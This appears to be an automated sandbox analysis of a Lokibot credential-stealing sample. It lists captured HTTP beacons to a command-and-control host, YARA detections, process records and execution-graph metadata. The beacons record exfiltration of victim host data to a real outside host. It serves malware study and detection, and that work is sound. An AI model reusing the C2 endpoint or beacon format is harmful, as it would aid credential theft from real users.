Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49749 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:34.891798973 CEST | 1139 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:34.926253080 CEST | 1140 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:35.758181095 CEST | 1140 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:19 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49750 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:40.626646042 CEST | 1141 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:40.660305023 CEST | 1141 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:41.569597960 CEST | 1141 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:25 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49751 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:43.382677078 CEST | 1142 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:43.416619062 CEST | 1143 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:44.299705982 CEST | 1143 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:27 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49754 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:45.504365921 CEST | 1175 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:45.538566113 CEST | 1180 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:46.411556005 CEST | 1290 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:29 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 8 | Source IP: 192.168.2.3 | Source Port: 49765 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:48.152004957 CEST | 1314 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:48.185455084 CEST | 1315 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:49.079457045 CEST | 1338 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:32 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 9 | Source IP: 192.168.2.3 | Source Port: 49771 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:50.748194933 CEST | 1354 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:50.782381058 CEST | 1354 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:51.674694061 CEST | 1354 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:35 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.



Target ID: 0
Start time: 18:08:06
Start date: 23/06/2022
Path: C:\Users\user\Desktop\hfyhigXccT.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\hfyhigXccT.exe"
Imagebase: 0xb80000
File size: 486912 bytes
MD5 hash: F0DDD6F32E65868ACC9D38B35AF0E2C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 4
Start time: 18:08:19
Start date: 23/06/2022
Path: C:\Users\user\Desktop\hfyhigXccT.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\hfyhigXccT.exe
Imagebase: 0x410000
File size: 486912 bytes
MD5 hash: F0DDD6F32E65868ACC9D38B35AF0E2C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 5
Start time: 18:08:21
Start date: 23/06/2022
Path: C:\Users\user\Desktop\hfyhigXccT.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\hfyhigXccT.exe
Imagebase: 0xc20000
File size: 486912 bytes
MD5 hash: F0DDD6F32E65868ACC9D38B35AF0E2C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                      Execution Graph

                                      Execution Coverage:8.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:102
                                      Total number of Limit Nodes:9
                                      execution_graph 28574 1589418 28578 15894ff 28574->28578 28583 1589510 28574->28583 28575 1589427 28579 1589523 28578->28579 28580 1589533 28579->28580 28588 1589798 28579->28588 28592 1589789 28579->28592 28580->28575 28584 1589523 28583->28584 28585 1589533 28584->28585 28586 1589798 LoadLibraryExW 28584->28586 28587 1589789 LoadLibraryExW 28584->28587 28585->28575 28586->28585 28587->28585 28589 15897ac 28588->28589 28591 15897d1 28589->28591 28596 1588f98 28589->28596 28591->28580 28593 15897ac 28592->28593 28594 1588f98 LoadLibraryExW 28593->28594 28595 15897d1 28593->28595 28594->28595 28595->28580 28597 1589978 LoadLibraryExW 28596->28597 28599 15899f1 28597->28599 28599->28591 28691 158b808 GetCurrentProcess 28692 158b87b 28691->28692 28693 158b882 GetCurrentThread 28691->28693 28692->28693 28694 158b8b8 28693->28694 28695 158b8bf GetCurrentProcess 28693->28695 28694->28695 28696 158b8f5 28695->28696 28697 158b91d GetCurrentThreadId 28696->28697 28698 158b94e 28697->28698 28600 7646e20 28602 7646e41 28600->28602 28601 7646e59 28602->28601 28605 7647920 28602->28605 28608 7645f7c 28605->28608 28609 7647958 DrawTextExW 28608->28609 28611 7646f6c 28609->28611 28612 15840d0 28613 15840e2 28612->28613 28614 15840ee 28613->28614 28618 15841e1 28613->28618 28623 1583c64 28614->28623 28616 158410d 28619 1584205 28618->28619 28627 15842d0 28619->28627 28631 15842e0 28619->28631 28624 1583c6f 28623->28624 28639 15851a4 28624->28639 28626 1586a88 28626->28616 28628 1584307 28627->28628 28629 15843e4 28628->28629 28635 1583de8 28628->28635 28632 1584307 28631->28632 28633 15843e4 28632->28633 28634 1583de8 CreateActCtxA 28632->28634 28634->28633 28636 1585370 CreateActCtxA 28635->28636 28638 1585433 28636->28638 28640 15851af 28639->28640 28643 158581c 28640->28643 28642 1586bbd 28642->28626 28644 1585827 28643->28644 28647 158584c 28644->28647 28646 1586c9a 28646->28642 28648 1585857 28647->28648 28651 158587c 28648->28651 28650 1586d8a 28650->28646 28653 1585887 28651->28653 28652 15874dc 28652->28650 28653->28652 28655 158b532 28653->28655 28656 158b561 28655->28656 28657 158b585 28656->28657 28660 158b6f0 28656->28660 28664 158b6e0 28656->28664 28657->28652 28662 158b6fd 28660->28662 28661 158b737 28661->28657 28662->28661 28668 158ab84 28662->28668 28665 158b6fd 28664->28665 28666 158ab84 LoadLibraryExW 28665->28666 28667 158b737 28665->28667 28666->28667 28667->28657 28669 158ab8f 28668->28669 28671 158c028 28669->28671 28672 158ac6c 28669->28672 28673 158ac77 28672->28673 28674 158587c LoadLibraryExW 28673->28674 28675 158c097 28673->28675 28674->28675 28679 158de28 28675->28679 28685 158de1a 28675->28685 28676 158c0d0 28676->28671 28681 158dea5 28679->28681 28682 158de59 28679->28682 28680 158de65 28680->28676 28681->28676 28682->28680 28683 158e2a8 LoadLibraryExW 28682->28683 28684 158e2a2 LoadLibraryExW 28682->28684 28683->28681 28684->28681 28687 158de59 28685->28687 28688 158dea5 28685->28688 28686 158de65 28686->28676 28687->28686 28689 158e2a8 LoadLibraryExW 28687->28689 28690 158e2a2 LoadLibraryExW 28687->28690 28688->28676 28689->28688 28690->28688 28699 158ba30 DuplicateHandle 28700 158bac6 28699->28700 28701 15896f2 28702 1589738 GetModuleHandleW 28701->28702 28703 1589732 28701->28703 28704 1589765 28702->28704 28703->28702
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.283343833.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7640000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31f917635e4f3deb9700b62579d1d3a5f67ea68ad3ff7bc30297f65efb05c28e
                                      • Instruction ID: 2c921185b60c69b44d575f6b1bbd65f3f516e01eeee28e27e89286d5f728012e
                                      • Opcode Fuzzy Hash: 31f917635e4f3deb9700b62579d1d3a5f67ea68ad3ff7bc30297f65efb05c28e
                                      • Instruction Fuzzy Hash: 1CB1E5B0B843558FDB188F74C856ABF76A2AB85710F15803AE507AB3C5DF70AC02CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.283343833.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7640000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0002f5df8551966bd5466e0f86fbae7440ede7ca2fe90f47b4028f15ac54948d
                                      • Instruction ID: 4bcf1f531c893e76d7f85ab70b2fe54f0f5212a6661506e748e7169b072af66c
                                      • Opcode Fuzzy Hash: 0002f5df8551966bd5466e0f86fbae7440ede7ca2fe90f47b4028f15ac54948d
                                      • Instruction Fuzzy Hash: 4AA19FB0E052599FCB11CFA9C880AEEFBF2FF8A304F14856AD519A7355C730A945CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0158B868
                                      • GetCurrentThread.KERNEL32 ref: 0158B8A5
                                      • GetCurrentProcess.KERNEL32 ref: 0158B8E2
                                      • GetCurrentThreadId.KERNEL32 ref: 0158B93B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: ed9d1a17e9df0f2ab1a3e7db59c52a91df4663baecca650bf72df13b2dc808e8
                                      • Instruction ID: 90708ae3c459d4a9dd3a99945901c8bf79d3c7ab964ea82a936c60c08424c33b
                                      • Opcode Fuzzy Hash: ed9d1a17e9df0f2ab1a3e7db59c52a91df4663baecca650bf72df13b2dc808e8
                                      • Instruction Fuzzy Hash: 215142B0A016898FEB14DFAAD5487EEBBF4BF89304F248859E409BB350C7345945CF26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0158B868
                                      • GetCurrentThread.KERNEL32 ref: 0158B8A5
                                      • GetCurrentProcess.KERNEL32 ref: 0158B8E2
                                      • GetCurrentThreadId.KERNEL32 ref: 0158B93B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: ae99c7877eb14de622ee48765ad6d3e0285bd2889ae20678eca8fd4f47473b91
                                      • Instruction ID: 1543706ff00ba9d909e2fe9f089cf10b2e6aa661c6b39850cf0227b7c5d1e5a3
                                      • Opcode Fuzzy Hash: ae99c7877eb14de622ee48765ad6d3e0285bd2889ae20678eca8fd4f47473b91
                                      • Instruction Fuzzy Hash: B55141B0A016898FEB14DFAAD548BAEBBF4FF49304F208459E419BB350C7346944CF26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 38 1585365-1585431 CreateActCtxA 40 158543a-1585494 38->40 41 1585433-1585439 38->41 48 15854a3-15854a7 40->48 49 1585496-1585499 40->49 41->40 50 15854b8 48->50 51 15854a9-15854b5 48->51 49->48 53 15854b9 50->53 51->50 53->53
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01585421
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 4db5d709241d2c7f974f03314d25cd7fcf2c83bd730e8c09d6ffddccc220fd2f
                                      • Instruction ID: 74abaf853cefaf8c665a2e9357c3823d6f1064c143e6803627b622b3df07d640
                                      • Opcode Fuzzy Hash: 4db5d709241d2c7f974f03314d25cd7fcf2c83bd730e8c09d6ffddccc220fd2f
                                      • Instruction Fuzzy Hash: AD410271D0066CCEDB24DFA9C884BDDBBB1BF89308F248069D418BB251DB75594ACF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 54 1583de8-1585431 CreateActCtxA 57 158543a-1585494 54->57 58 1585433-1585439 54->58 65 15854a3-15854a7 57->65 66 1585496-1585499 57->66 58->57 67 15854b8 65->67 68 15854a9-15854b5 65->68 66->65 70 15854b9 67->70 68->67 70->70
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01585421
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: a0f799045fe979831a051c20fb6a4d855342b02eedf76092ea00bb9a70285bd8
                                      • Instruction ID: 9d0c33d3f1cb773b2586ba9f5848eaf4fd0f48a93f0d7d259159e5ae742d952b
                                      • Opcode Fuzzy Hash: a0f799045fe979831a051c20fb6a4d855342b02eedf76092ea00bb9a70285bd8
                                      • Instruction Fuzzy Hash: 7C41FF71D0462CCFDB24DFA9C844B9EBBB1BF88308F208469D518BB251EB756949CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 71 7645f7c-76479a4 73 76479a6-76479ac 71->73 74 76479af-76479be 71->74 73->74 75 76479c0 74->75 76 76479c3-76479fc DrawTextExW 74->76 75->76 77 7647a05-7647a22 76->77 78 76479fe-7647a04 76->78 78->77
                                      APIs
                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0764793D,?,?), ref: 076479EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.283343833.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7640000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: DrawText
                                      • String ID:
                                      • API String ID: 2175133113-0
                                      • Opcode ID: 0ce6f513d376f84480e9ee2ebad860e7a67835ceddd1e30a7cc76afe3b8b89aa
                                      • Instruction ID: 310d588463293e1fdf5935eb92d93649949ef7d7ad3c68784bc8baeb434a7037
                                      • Opcode Fuzzy Hash: 0ce6f513d376f84480e9ee2ebad860e7a67835ceddd1e30a7cc76afe3b8b89aa
                                      • Instruction Fuzzy Hash: 1C31E3B5D003499FCB10CFAAD884AAEBBF5FF48320F14842AE915A7310D774A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

